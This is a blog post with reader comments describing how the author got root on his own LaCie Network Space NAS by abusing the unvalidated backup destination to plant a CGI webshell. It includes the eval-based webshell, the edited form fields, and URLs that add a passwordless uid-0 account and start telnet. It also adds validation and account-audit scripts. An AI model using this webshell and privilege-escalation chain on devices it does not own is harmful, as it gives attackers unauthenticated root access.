2009-08-10

Get root on the Lacie Network Space without opening it

Note: following these instructions is very likely to invalidate your warranty and possibly brick your Network Space. I take no responsibility for this. You have been warned.

As I mentioned the other day, I had problems playing media on my new TV from my Lacie Network Space NAS. There are instructions on the NAS-Central wiki for taking apart your NAS, attaching the drive to another (Linux) computer and overwriting stuff. Most of this info was gained from a site describing how to hack another NAS, the Edmini V2. Tantalisingly, in the comments for that page there was a description of how to get this working purely through software, without opening the case. The instructions were slightly difficult to follow so I have decided to document them again here, but really they belong to the anonymous commenter.

This whole hack revolves around the backup function of the NAS, which allows one to back up the contents of a USB device to the hard disk. The parameters for this backup (the source directory on the USB device and the destination directory on the disk) are ordinary fields in a web form, and the NAS does nothing to check that the destination is somewhere a backup should go. That lets us save the page, alter the values to suit our purposes and submit it. In this case the destination is the admin CGI directory, so whatever we put on the stick gets copied to a place where the NAS's own web server will execute it. To start I created an ext3-formatted USB key (I used an Ubuntu development virtual machine). I created a file called webshell on my desktop with the contents:

#!/bin/sh
# Minimal CGI shell: whatever follows the "?" in the URL is echoed back
# and then passed to eval, so .../webshell?ls runs "ls" with the
# privileges of the web server (which, as the later steps show, is root).
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

I also downloaded a small telnet daemon, utelnetd, to the desktop. Next I created a directory on the stick, copied both files over and made them executable (the execute bit has to survive the copy for the NAS to run webshell as a CGI script):

mkdir /media/disk/hack
cp Desktop/utelnetd /media/disk/hack
cp Desktop/webshell /media/disk/hack
chmod -R +x /media/disk/hack


I popped the stick in the USB port on the front of the Lacie and navigated to the config pages at http://nas/config from my laptop. I did a view source, cut and pasted everything into a new text file on my desktop, and searched for the following strings, editing each as shown. The first two edits are needed because the saved copy is opened from local disk, so the page's relative URLs have to be made absolute; the last two are the actual attack, pointing the backup at our directory on the stick and at the CGI directory on the NAS:
common.js - prepended http://nas/ to the start of the src (src='http://nas/javascripts/common.js')
edit_form - prepended http://nas/cgi-bin/admin/ to the start of the action (action='http://nas/cgi-bin/admin/backup')
usbdisksdb1 - changed the value to match the directory name on the stick (value='/home/usbdisksdb1/hack')
selected - changed the value to the web CGI directory (value='/www/cgi-bin/admin')

I saved the file on my desktop, opened it in Firefox and hit the Start button. An error flashed by as the page redirected, but the lights on the NAS and the USB stick both flashed and eventually the page redirected to the NAS's own version of itself.
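The server-side check that the backup CGI is missing, written as an added example for this post (it is not LaCie's code). The real form field names are not known from the page, so the source and destination are taken as two positional arguments; the USB mount point and the tree a backup may write to are assumptions set at the top:

```shell
#!/bin/sh
# Added example: the validation the NAS backup CGI should have performed.
# Not LaCie's code. Assumed: backups may only read from the USB mount under
# USB_ROOT and only write somewhere under BACKUP_ROOT; both are assumptions.
BACKUP_ROOT=/home
USB_ROOT=/home/usbdisksdb1

# normalize_path PATH: print a lexically cleaned absolute path, or print
# nothing and return 1 if it is relative, has a ".." segment, or contains
# anything outside a conservative character set (no spaces, quotes, $, ;).
normalize_path() {
    p=$1
    case "$p" in
        /*) ;;
        *) return 1 ;;
    esac
    case "$p" in
        *[!A-Za-z0-9_./-]*) return 1 ;;
    esac
    out=""
    old_ifs=$IFS
    IFS=/
    set -- $p
    IFS=$old_ifs
    for seg in "$@"; do
        case "$seg" in
            ""|.) ;;
            ..) return 1 ;;
            *) out="$out/$seg" ;;
        esac
    done
    [ -n "$out" ] || out=/
    printf '%s\n' "$out"
}

# under_root ROOT PATH: 0 if PATH equals ROOT or lies strictly inside it.
# Both must already be normalized, otherwise "/homeX" or "/home/../www"
# would slip past a plain prefix test.
under_root() {
    case "$2" in
        "$1"|"$1"/*) return 0 ;;
    esac
    return 1
}

# check_backup_request SRC DST: validate the two form parameters.
# Prints "SRC DST" (cleaned) and returns 0, or prints nothing and returns 1.
check_backup_request() {
    src=$(normalize_path "$1") || return 1
    dst=$(normalize_path "$2") || return 1
    under_root "$USB_ROOT" "$src" || return 1
    under_root "$BACKUP_ROOT" "$dst" || return 1
    # never let a backup write back into the USB tree it reads from
    if under_root "$USB_ROOT" "$dst"; then
        return 1
    fi
    printf '%s %s\n' "$src" "$dst"
}

# Demonstration on constructed requests: a legitimate backup, the post's
# redirection into the CGI directory, and two variants of the same idea.
for req in \
    "/home/usbdisksdb1/hack /home/openshare/backup" \
    "/home/usbdisksdb1/hack /www/cgi-bin/admin" \
    "/home/usbdisksdb1/hack /home/../www/cgi-bin/admin" \
    "/home/usbdisksdb1/hack /home/openshare;id"
do
    set -- $req
    if check_backup_request "$1" "$2" >/dev/null; then
        echo "accepted: $req"
    else
        echo "rejected: $req"
    fi
done
```

The point of normalising before the prefix test is that a destination of /home/../www/cgi-bin/admin starts with /home but ends up in the CGI directory; checking the cleaned path, and refusing anything with a ".." segment at all, closes that.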

The NAS creates a timestamped backup directory, so the copied files end up under a name we don't know in advance. Fortunately there is a way to see what this directory is called using the Twonky media server (which is, ironically, the thing that isn't working in the first place). Navigate to http://nas:9000/rpc/set_option?contentbase=/ (this presumes that you've unlocked access to the Twonky config page; see the comments below). Then go to http://nas:9000/config, hit one of the Browse buttons and navigate down through /www/cgi-bin/admin/ to see your folder name. Cut this name out (in my case it was hack-200001030801946888523) and paste it into the following URL in place of FOLDER:

http://nas/cgi-bin/admin/FOLDER/webshell?ls


I was rewarded with a directory listing appearing in Firefox. At this point I followed another comment, by Danny Milot, and requested the following URLs one after another (each one runs whatever follows the ? as a shell command on the NAS):

http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?find / -name passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp passwd passwd.ori; ls -als passwd*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:x:0:0:Linux User,,,:/home:/bin/sh >> /etc/passwd; echo sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin >> /etc/passwd; cat /etc/passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:$1$4VBM4/sM$R2TB/cCBAb11R5LH4VGhU/:12488:0:99999:7:::; echo Password for new_root is admin
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp shadow shadow.ori; ls -als shadow*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root::12488:0:99999:7::: >> /etc/shadow; echo No password; cat /etc/shadow
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?./utelnetd
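A check for what the steps above leave behind, as an added example (my code, not from the post): scan a passwd and shadow pair for uid-0 accounts other than root, accounts whose shadow password field is empty, and passwd entries with no shadow line at all. The sample files are constructed from the lines in the post, with a placeholder in place of a real hash for root.

```shell
#!/bin/sh
# Added example (my code, not from the post): audit a passwd/shadow pair for
# the kind of changes made above. Sample files are constructed below from the
# post's lines; root's hash is a placeholder, not a real one.

# find_extra_uid0 PASSWD: names of uid-0 accounts other than root
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# find_empty_passwords SHADOW: accounts whose password field is empty, i.e.
# accounts that log in with no password at all
find_empty_passwords() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# find_missing_shadow PASSWD SHADOW: passwd entries that defer to shadow
# ("x") but have no shadow line; awk reads the shadow file first
find_missing_shadow() {
    awk -F: 'FILENAME == ARGV[1] { seen[$1] = 1; next }
             $2 == "x" && !($1 in seen) { print $1 }' "$2" "$1"
}

# audit_accounts PASSWD SHADOW: print every finding; return 1 if there are any
audit_accounts() {
    n=0
    for u in $(find_extra_uid0 "$1"); do
        echo "uid 0 account besides root: $u"; n=$((n + 1))
    done
    for u in $(find_empty_passwords "$2"); do
        echo "empty password field: $u"; n=$((n + 1))
    done
    for u in $(find_missing_shadow "$1" "$2"); do
        echo "no shadow entry: $u"; n=$((n + 1))
    done
    [ "$n" -eq 0 ]
}

# Constructed sample data modelled on the post's passwd and shadow lines.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
new_root:x:0:0:Linux User,,,:/home:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
EOF
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$1$placeholder$notarealhash:12488:0:99999:7:::
nobody:*:12488:0:99999:7:::
new_root::12488:0:99999:7:::
EOF

# On the real box: audit_accounts /etc/passwd /etc/shadow
audit_accounts "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/shadow" || echo "see findings above"
```

Run against the sample it reports new_root twice (uid 0 and no password) and sshd once (added to passwd but never to shadow), which is exactly the state the commands above leave the box in until passwd is run later. It is also the check to run on any NAS that may have been through this procedure before you trusted it.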

At this point I was able to telnet into the NAS using new_root as the username and a blank password. (Note that the request which echoes the $1$ hash only prints it; nothing appends it to /etc/shadow. The entry that actually takes effect is the passwordless one appended in the next-but-one request, which is why the login has no password. The sshd user is added now because the privilege-separated OpenSSH installed below needs it.) I'm lazy, so I decided to use ipkg to install things. I followed the manual bootstrap instructions, which didn't work at first until I removed a spurious entry in /etc/resolv.conf by rewriting the file with echo (see the comments below). Then it was a case of:

ipkg update
ipkg install openssh
ipkg install nano


Then it was just a case of sorting out some startup scripts, reusing the init script that the openssh package installs under /opt/etc/init.d:

cp /opt/etc/init.d/S40sshd /etc/init.d/sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S20sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc6.d/K09sshd

Then setting a proper password for the new account, which until now has none:

passwd new_root


Finally, there is a cleanup script at /etc/rc.d/rc3.d/S12cleanConf that resets and deletes things on every boot, so I just commented everything out in it. I rebooted and SSH didn't come up. This was because the optware tree, which the bootstrap had put under /share/.optware, was not mounted on /opt at boot, so the sshd init script had nothing to start. I copied the contents out to the user area and added a bind mount of that copy to the fstab:

mkdir /home/.optware
cp -r /share/.optware/* /home/.optware
echo /home/.optware /opt auto rw,bind 0 0 >> /etc/fstab

(Bind the copy under /home, not the original under /share; Alain makes the same point in the comments.) Then I created /etc/rc.d/rc3.d/S12mountopt, a two-line shell script (a #!/bin/sh line followed by mount /opt), and made it executable with chmod +x, since it will not run at boot otherwise.
Then the webshell and utelnetd can be removed. Do delete the hack-* backup directory under /www/cgi-bin/admin rather than leaving it: the webshell inside it is a root shell reachable over plain HTTP by anyone on the network. And Bob's your uncle.
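An idempotent version of the S12mountopt script, as an added example (my code, not the post's own two-line script): it consults /proc/mounts before mounting, so it is safe to run again by hand, and uses an explicit bind mount so the fstab line is not required. The source path follows the copy made to /home/.optware above; the mounts table at the bottom is constructed for the self-check.

```shell
#!/bin/sh
# Added example, not the post's own S12mountopt: bind-mount the optware tree
# on /opt only if nothing is mounted there yet, so running it twice (at boot
# and again by hand) is harmless. Assumed paths: OPT_SRC is the copy made to
# /home/.optware; OPT_DST is /opt.
OPT_SRC=/home/.optware
OPT_DST=/opt

# is_mounted MOUNTS_FILE DIR: 0 if DIR is exactly the mount point of some
# entry in a /proc/mounts-style table (second column), else 1. Reading the
# table avoids depending on a "mountpoint" utility the busybox build may lack.
is_mounted() {
    awk -v d="$2" '$2 == d { found = 1 } END { exit !found }' "$1"
}

# ensure_opt_mounted: mount if needed; 0 when /opt is mounted afterwards.
ensure_opt_mounted() {
    if is_mounted /proc/mounts "$OPT_DST"; then
        return 0
    fi
    if [ ! -d "$OPT_SRC" ]; then
        echo "$OPT_SRC does not exist, nothing to mount" >&2
        return 1
    fi
    mkdir -p "$OPT_DST"
    mount -o bind "$OPT_SRC" "$OPT_DST"
}

# Self-check on a constructed mounts table (a bind mount shows the
# underlying block device as its source, not the bound directory).
SAMPLE_MOUNTS=$(mktemp)
trap 'rm -f "$SAMPLE_MOUNTS"' EXIT
cat > "$SAMPLE_MOUNTS" <<'EOF'
rootfs / rootfs rw 0 0
/dev/sda2 /home ext3 rw,noatime 0 0
/dev/sda2 /opt ext3 rw,noatime 0 0
EOF
is_mounted "$SAMPLE_MOUNTS" /opt && echo "sample: /opt is mounted"
is_mounted "$SAMPLE_MOUNTS" /share || echo "sample: /share is not mounted"

# init-script entry points; with no argument only the functions are defined
case "${1:-}" in
    start) ensure_opt_mounted ;;
    stop)  if is_mounted /proc/mounts "$OPT_DST"; then umount "$OPT_DST"; fi ;;
esac
```

Install it as /etc/rc.d/rc3.d/S12mountopt, chmod +x it, and the sshd script that runs later in the same directory will find /opt populated.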

11 comments:

stephane.guelec said...

Perfect, it works very well for me.
Just a remark, there is a mistake:

The request
"http://nas:9000/rpc/set_option?content_base=/"
is in fact "http://nas:9000/rpc/set_option?contentbase=/"
enjoy sshd & ipkg on the networkspace

Tim said...

Stephane,

Thanks for the correction. I'm glad that you've managed to get root on your Lacie, it certainly increases the usefulness of the device.

Cheers,

Tim.

Liste Indépendante 3 said...

Hello there,
Many thanks it worked and now I have ssh running on Lacie Network Space (750GB firmware 1.1.4). Couple of comments/adaptations I did:
- The page for backup to edit and change is actually at http://dakroub-backup/cgi-bin/admin/backup
- You must not forget to do chmod +x on S12mountopt, and also I used /home/.optware to mount /opt (isn't that what you intended when you copied the content to /home/.optware?)

In any case, many many thanks for the instructions!

- Alain

William said...

Can you explain in more detail how you unlocked the Twonky config page please?

Tim said...

William,

It's documented here: http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

Essentially, just set the IP of your NAS to 192.168.1.61 and the IP of your PC to 192.168.1.6. Then access the config page at: 192.168.1.61:9000

William said...

Thanks, worked fine.

I would like to install ipkg. You said that you had to "removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes.". Could you elaborate on that a bit please?!

Cheers

Tim said...

Like I say, I think there was a spurious entry in /etc/resolv.conf, so I re-wrote the file with the IP of my router a la:

echo "192.168.1.254" > /etc/resolv.conf

Kyle said...

Tim,

I have a question concerning this post. Did you then install a webserver package such as Apache or Lighttpd after gaining root access to the device? I recently purchased a Roku Streaming TV box, and am trying to connect it to my Lacie NetworkSpace2 NAS, which I purchased with the intention of streaming media files from. However, the Lacie NAS cannot do this out of the box, and I am having a hard time finding documentation on how to do this. I am assuming that I need to follow your tutorial to gain root access, but then where can I go from there? The Roku needs to access a web server to build its media directories. Please let me know if you have any thoughts and would be interested in helping me out with this. Thank you.

-Kyle

Tim said...

Kyle,

I haven't installed my own webserver on the Lacie. I haven't needed one for anything.

Note that there is already a webserver installed (running the admin pages), so it is possible that if you got root you would be able to direct that to your content directory.

The binary is /usr/sbin/httpd. If the roku supports specifying a port you could run the httpd on 8080 or something. It should be a simple case of copying the /etc/init.d/httpd script to /etc/init.d/httpd2 and changing the variables for port and directory (to /home/openshare/).

Hope this helps.

Cheers,

Tim

Kyle said...

Tim,

I have received root access on my Network Space. Here is what Terminal is giving me:
------------------------------------
Last login: Sun Mar 6 18:05:36 on ttys000
kyles-macbook-pro:~ kyleaffolder$ ssh -i ./lacie_ns2 root@192.168.1.42
The authenticity of host '192.168.1.42 (192.168.1.42)' can't be established.
RSA key fingerprint is 76:bf:66:74:3e:60:0c:9e:aa:60:8a:13:6a:c3:9e:45.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.42' (RSA) to the list of known hosts.
Identity added: ./lacie_ns2 (./lacie_ns2)
[root@NetworkSpace2 ~]#
------------------------------------
So, I'm pretty sure that I now have root access via SSH. I'm confused as to what steps to take next though when setting up the web server directory. Could you maybe type these out in a little more detail...step by step? I would really appreciate it!!!
Here is what you had mentioned earlier:
------
"Note that there is already a webserver installed (running the admin pages), so it is possible that if you got root you would be able to direct that to your content directory.

The binary is /usr/sbin/httpd. If the roku supports specifying a port you could run the httpd on 8080 or something. It should be a simple case of copying the /etc/init.d/httpd script to /etc/init.d/httpd2 and changing the variables for port and directory (to /home/openshare/)."
------

How would I now go about changing directories/copying the scripts/changing variables/etc? I'd greatly appreciate any help or further insight into this matter. I feel as if I'm close to getting this problem solved. Could you maybe enlighten me on what I need to type into terminal from here on out?

Thank you for your time!

-Kyle

Tim said...

Kyle - I've looked a little further into this and there is a good chance that it won't work using the built in httpd. I don't think it does directory listing, which is I presume what the Roku needs.

If you've installed ipkg, try running:
ipkg install lighttpd

There are some instructions here: http://tomatousb.org/forum/t-282372/lighttpd-on-tomato-usb#post-919862 on configuring, specifically you'll want to change the document root and the port that it runs on.